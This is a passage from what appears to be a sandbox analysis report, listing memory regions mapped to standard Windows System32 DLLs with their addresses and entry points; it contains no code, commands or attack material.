= "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1717 start_va = 0x7ffa08e00000 end_va = 0x7ffa08e1efff monitored = 0 entry_point = 0x7ffa08e037e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 1718 start_va = 0x7ffa08e20000 end_va = 0x7ffa08e98fff monitored = 0 entry_point = 0x7ffa08e276a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 1719 start_va = 0x7ffa08eb0000 end_va = 0x7ffa08eeffff monitored = 0 entry_point = 0x7ffa08ec6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1720 start_va = 0x7ffa08f10000 end_va = 0x7ffa08f27fff monitored = 0 entry_point = 0x7ffa08f14e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 1721 start_va = 0x7ffa08f30000 end_va = 0x7ffa08f54fff monitored = 0 entry_point = 0x7ffa08f35ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 1722 start_va = 0x7ffa08f60000 end_va = 0x7ffa090e1fff monitored = 0 entry_point = 0x7ffa08f782a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1723 start_va = 0x7ffa090f0000 end_va = 0x7ffa09192fff monitored = 0 entry_point = 0x7ffa090f2c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1724 start_va = 0x7ffa091a0000 end_va = 0x7ffa091f1fff monitored = 0 entry_point = 0x7ffa091a5770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1725 start_va = 0x7ffa09200000 end_va = 0x7ffa0922dfff monitored = 1 entry_point = 0x7ffa09202300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 1726 start_va = 0x7ffa09230000 end_va = 0x7ffa0928dfff monitored = 0 entry_point = 0x7ffa09235080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 1727 start_va = 0x7ffa09290000 end_va = 0x7ffa092affff monitored = 0 entry_point = 0x7ffa09291f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 1728 start_va = 0x7ffa092b0000 end_va = 0x7ffa092b8fff monitored = 0 entry_point = 0x7ffa092b18f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 1729 start_va = 0x7ffa092c0000 end_va = 0x7ffa092d0fff monitored = 0 entry_point = 0x7ffa092c1d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1730 start_va = 0x7ffa09330000 end_va = 0x7ffa09347fff monitored = 0 entry_point = 0x7ffa09332000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1731 start_va = 0x7ffa09350000 end_va = 0x7ffa09390fff monitored = 0 entry_point = 0x7ffa09353750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1732 start_va = 0x7ffa09430000 end_va = 0x7ffa0947bfff monitored = 0 entry_point = 0x7ffa09445310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1733 start_va = 0x7ffa09490000 end_va = 0x7ffa0950efff monitored = 0 entry_point = 0x7ffa094a7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1734 start_va = 0x7ffa09510000 end_va = 0x7ffa0954bfff monitored = 0 entry_point = 0x7ffa09516aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1735 start_va = 0x7ffa09c80000 end_va = 0x7ffa09c88fff monitored = 0 entry_point = 0x7ffa09c821d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 1736 start_va = 0x7ffa09c90000 end_va = 0x7ffa09cc4fff monitored = 0 entry_point = 0x7ffa09c9a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 1737 start_va = 0x7ffa0a560000 end_va = 0x7ffa0a652fff monitored = 0 entry_point = 0x7ffa0a585d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1738 start_va = 0x7ffa0ac50000 end_va = 0x7ffa0ac59fff monitored = 0 entry_point = 0x7ffa0ac514c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1739 start_va = 0x7ffa0afc0000 end_va = 0x7ffa0afd1fff monitored = 0 entry_point = 0x7ffa0afc3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1740 start_va = 0x7ffa0b050000 end_va = 0x7ffa0b06afff monitored = 0 entry_point = 0x7ffa0b051040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1741 start_va = 0x7ffa0b300000 end_va = 0x7ffa0b314fff monitored = 0 entry_point = 0x7ffa0b302dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1742 start_va = 0x7ffa0b320000 end_va = 0x7ffa0b32dfff monitored = 0 entry_point = 0x7ffa0b321460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1743 start_va = 0x7ffa0b330000 end_va = 0x7ffa0b33bfff monitored = 0 entry_point = 0x7ffa0b332830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 1744 start_va = 0x7ffa0b340000 end_va = 0x7ffa0b34ffff monitored = 0 entry_point = 0x7ffa0b341700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 1745 start_va = 0x7ffa0b350000 end_va = 0x7ffa0b358fff monitored = 0 entry_point = 0x7ffa0b351ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 1746 start_va = 0x7ffa0b360000 end_va = 0x7ffa0b38cfff monitored = 0 entry_point = 0x7ffa0b362290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 1747 start_va = 0x7ffa0b390000 end_va = 0x7ffa0b3e1fff monitored = 0 entry_point = 0x7ffa0b3938e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 1748 start_va = 0x7ffa0b4a0000 end_va = 0x7ffa0b4b4fff monitored = 0 entry_point = 0x7ffa0b4a3460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1749 start_va = 0x7ffa0b4c0000 end_va = 0x7ffa0b559fff monitored = 0 entry_point = 0x7ffa0b4dada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1750 start_va = 0x7ffa0b640000 end_va = 0x7ffa0b6a6fff monitored = 0 entry_point = 0x7ffa0b6463e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1751 start_va = 0x7ffa0b7a0000 end_va = 0x7ffa0b7aafff monitored = 0 entry_point = 0x7ffa0b7a1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1752 start_va = 0x7ffa0b800000 end_va = 0x7ffa0b8bffff monitored = 0 entry_point = 0x7ffa0b82fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1753 start_va = 0x7ffa0b9f0000 end_va = 0x7ffa0ba09fff monitored = 0 entry_point = 0x7ffa0b9f2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1754 start_va = 0x7ffa0ba10000 end_va = 0x7ffa0ba25fff monitored = 0 entry_point = 0x7ffa0ba119f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1755 start_va = 0x7ffa0baf0000 end_va = 0x7ffa0bb27fff monitored = 0 entry_point = 0x7ffa0bb08cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1756 start_va = 0x7ffa0bbe0000 end_va = 0x7ffa0bc8dfff monitored = 0 entry_point = 0x7ffa0bbf80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 1757 start_va = 0x7ffa0bc90000 end_va = 0x7ffa0bca1fff monitored = 0 entry_point = 0x7ffa0bc99260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 1758 start_va = 0x7ffa0bcb0000 end_va = 0x7ffa0bd60fff monitored = 0 entry_point = 0x7ffa0bd288b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 1759 start_va = 0x7ffa0bd70000 end_va = 0x7ffa0bd83fff monitored = 0 entry_point = 0x7ffa0bd72d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1760 start_va = 0x7ffa0bd90000 end_va = 0x7ffa0bdf6fff monitored = 0 entry_point = 0x7ffa0bd9b160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1761 start_va = 0x7ffa0bea0000 end_va = 0x7ffa0beb3fff monitored = 0 entry_point = 0x7ffa0bea2a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1762 start_va = 0x7ffa0c070000 end_va = 0x7ffa0c102fff monitored = 0 entry_point = 0x7ffa0c079680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 1763 start_va = 0x7ffa0c1a0000 end_va = 0x7ffa0c1e5fff monitored = 0 entry_point = 0x7ffa0c1a79a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 1764 start_va = 0x7ffa0c2b0000 end_va = 0x7ffa0c2d4fff monitored = 0 entry_point = 0x7ffa0c2c2f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 1765 start_va = 0x7ffa0c2e0000 end_va = 0x7ffa0c2f0fff monitored = 0 entry_point = 0x7ffa0c2e7ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 1766 start_va = 0x7ffa0c300000 end_va = 0x7ffa0c318fff monitored = 0 entry_point = 0x7ffa0c304520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1767 start_va = 0x7ffa0c9a0000 end_va = 0x7ffa0c9befff monitored = 0 entry_point = 0x7ffa0c9a4960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1768 start_va = 0x7ffa0ca80000 end_va = 0x7ffa0ca99fff monitored = 0 entry_point = 0x7ffa0ca82cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 1769 start_va = 0x7ffa0ce40000 end_va = 0x7ffa0d1c1fff monitored = 0 entry_point = 0x7ffa0ce91220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1770 start_va = 0x7ffa0e2c0000 end_va = 0x7ffa0e3cdfff monitored = 0 entry_point = 0x7ffa0e30eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 1771 start_va = 0x7ffa0e6d0000 end_va = 0x7ffa0e724fff monitored = 0 entry_point = 0x7ffa0e6d3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1772 start_va = 0x7ffa0e730000 end_va = 0x7ffa0e766fff monitored = 0 entry_point = 0x7ffa0e736020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 1773 start_va = 0x7ffa0e770000 end_va = 0x7ffa0e78ffff monitored = 0 entry_point = 0x7ffa0e7739a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 1774 start_va = 0x7ffa0e790000 end_va = 0x7ffa0e7a6fff monitored = 0 entry_point = 0x7ffa0e795630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1775 start_va = 0x7ffa0e7b0000 end_va = 0x7ffa0e7c2fff monitored = 0 entry_point = 0x7ffa0e7b57f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1776 start_va = 0x7ffa0e7d0000 end_va = 0x7ffa0e849fff monitored = 0 entry_point = 0x7ffa0e7f7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1777 start_va = 0x7ffa0e850000 end_va = 0x7ffa0e87dfff monitored = 0 entry_point = 0x7ffa0e857550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1778 start_va = 0x7ffa0e880000 end_va = 0x7ffa0e895fff monitored = 0 entry_point = 0x7ffa0e881b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1779 start_va = 0x7ffa0e8a0000 end_va = 0x7ffa0e903fff monitored = 0 entry_point = 0x7ffa0e8b5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1780 start_va = 0x7ffa0ead0000 end_va = 0x7ffa0eb10fff monitored = 0 entry_point = 0x7ffa0ead4840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 1781 start_va = 0x7ffa0eb20000 end_va = 0x7ffa0eb2bfff monitored = 0 entry_point = 0x7ffa0eb214d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 1782 start_va = 0x7ffa0eb30000 end_va = 0x7ffa0ec65fff monitored = 0 entry_point = 0x7ffa0eb5f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1783 start_va = 0x7ffa0ec70000 end_va = 0x7ffa0ed55fff monitored = 0 entry_point = 0x7ffa0ec8cf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 1784 start_va = 0x7ffa0ed60000 end_va = 0x7ffa0ee27fff monitored = 0 entry_point = 0x7ffa0eda13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1785 start_va = 0x7ffa0ee30000 end_va = 0x7ffa0ee90fff monitored = 0 entry_point = 0x7ffa0ee34b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1786 start_va = 0x7ffa0eea0000 end_va = 0x7ffa0f01bfff monitored = 0 entry_point = 0x7ffa0eef1650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 1787 start_va = 0x7ffa0f020000 end_va = 0x7ffa0f02afff monitored = 0 entry_point = 0x7ffa0f021770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 1788 start_va = 0x7ffa0f030000 end_va = 0x7ffa0f06dfff monitored = 0 entry_point = 0x7ffa0f03a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1789 start_va = 0x7ffa0f070000 end_va = 0x7ffa0f096fff monitored = 0 entry_point = 0x7ffa0f073bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 1790 start_va = 0x7ffa0f0f0000 end_va = 0x7ffa0f144fff monitored = 0 entry_point = 0x7ffa0f0ffc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1791 start_va = 0x7ffa0f190000 end_va = 0x7ffa0f221fff monitored = 0 entry_point = 0x7ffa0f1da780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1792 start_va = 0x7ffa0f2b0000 end_va = 0x7ffa0f2bcfff monitored = 0 entry_point = 0x7ffa0f2b1420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1793 start_va = 0x7ffa0f2d0000 end_va = 0x7ffa0f2dffff monitored = 0 entry_point = 0x7ffa0f2d2c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 1794 start_va = 0x7ffa0f2e0000 end_va = 0x7ffa0f2ecfff monitored = 0 entry_point = 0x7ffa0f2e2ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 1795 start_va = 0x7ffa0f2f0000 end_va = 0x7ffa0f31efff monitored = 0 entry_point = 0x7ffa0f2f8910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 1796 start_va = 0x7ffa0f370000 end_va = 0x7ffa0f3ddfff monitored = 0 entry_point = 0x7ffa0f377f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1797 start_va = 0x7ffa0f3e0000 end_va = 0x7ffa0f3f0fff monitored = 0 entry_point = 0x7ffa0f3e3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1798 start_va = 0x7ffa0f430000 end_va = 0x7ffa0f465fff monitored = 0 entry_point = 0x7ffa0f440070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1799 start_va = 0x7ffa0fc30000 end_va = 0x7ffa0fc70fff monitored = 0 entry_point = 0x7ffa0fc47eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1800 start_va = 0x7ffa0fc80000 end_va = 0x7ffa0fd7bfff monitored = 0 entry_point = 0x7ffa0fcb6df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1801 start_va = 0x7ffa0fe10000 end_va = 0x7ffa0fecefff monitored = 0 entry_point = 0x7ffa0fe31c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1802 start_va = 0x7ffa0ff20000 end_va = 0x7ffa0ff29fff monitored = 0 entry_point = 0x7ffa0ff21660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1803 start_va = 0x7ffa0ff30000 end_va = 0x7ffa0ff47fff monitored = 0 entry_point = 0x7ffa0ff35910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1804 start_va = 0x7ffa0ff50000 end_va = 0x7ffa1009cfff monitored = 0 entry_point = 0x7ffa0ff93da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1805 start_va = 0x7ffa10cc0000 end_va = 0x7ffa11152fff monitored = 0 entry_point = 0x7ffa10ccf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1806 start_va = 0x7ffa11160000 end_va = 0x7ffa111c6fff monitored = 0 entry_point = 0x7ffa1117e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 1807 start_va = 0x7ffa11220000 end_va = 0x7ffa113a5fff monitored = 0 entry_point = 0x7ffa1126d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1808 start_va = 0x7ffa113b0000 end_va = 0x7ffa113cbfff monitored = 0 entry_point = 0x7ffa113b37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1809 start_va = 0x7ffa113d0000 end_va = 0x7ffa113dafff monitored = 0 entry_point = 0x7ffa113d1de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1810 start_va = 0x7ffa11410000 end_va = 0x7ffa11422fff monitored = 0 entry_point = 0x7ffa11412760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1811 start_va = 0x7ffa114c0000 end_va = 0x7ffa114c9fff monitored = 0 entry_point = 0x7ffa114c1350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1812 start_va = 0x7ffa11600000 end_va = 0x7ffa11607fff monitored = 0 entry_point = 0x7ffa116013e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 1813 start_va = 0x7ffa11640000 end_va = 0x7ffa1167ffff monitored = 0 entry_point = 0x7ffa11651960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 1814 start_va = 0x7ffa117d0000 end_va = 0x7ffa117f6fff monitored = 0 entry_point = 0x7ffa117d7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1815 start_va = 0x7ffa11800000 end_va = 0x7ffa118a9fff monitored = 0 entry_point = 0x7ffa11827910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1816 start_va = 0x7ffa118b0000 end_va = 0x7ffa119affff monitored = 0 entry_point = 0x7ffa118f0f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1817 start_va = 0x7ffa11a40000 end_va = 0x7ffa11a4bfff monitored = 0 entry_point = 0x7ffa11a42480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1818 start_va = 0x7ffa11b10000 end_va = 0x7ffa11b41fff monitored = 0 entry_point = 0x7ffa11b22340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1819 start_va = 0x7ffa11d80000 end_va = 0x7ffa11d8bfff monitored = 0 entry_point = 0x7ffa11d82790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1820 start_va = 0x7ffa11d90000 end_va = 0x7ffa11db3fff monitored = 0 entry_point = 0x7ffa11d93260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1821 start_va = 0x7ffa11f30000 end_va = 0x7ffa12023fff monitored = 0 entry_point = 0x7ffa11f3a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1822 start_va = 0x7ffa12080000 end_va = 0x7ffa120c8fff monitored = 0 entry_point = 0x7ffa1208a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1823 start_va = 0x7ffa121a0000 end_va = 0x7ffa121abfff monitored = 0 entry_point = 0x7ffa121a27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: 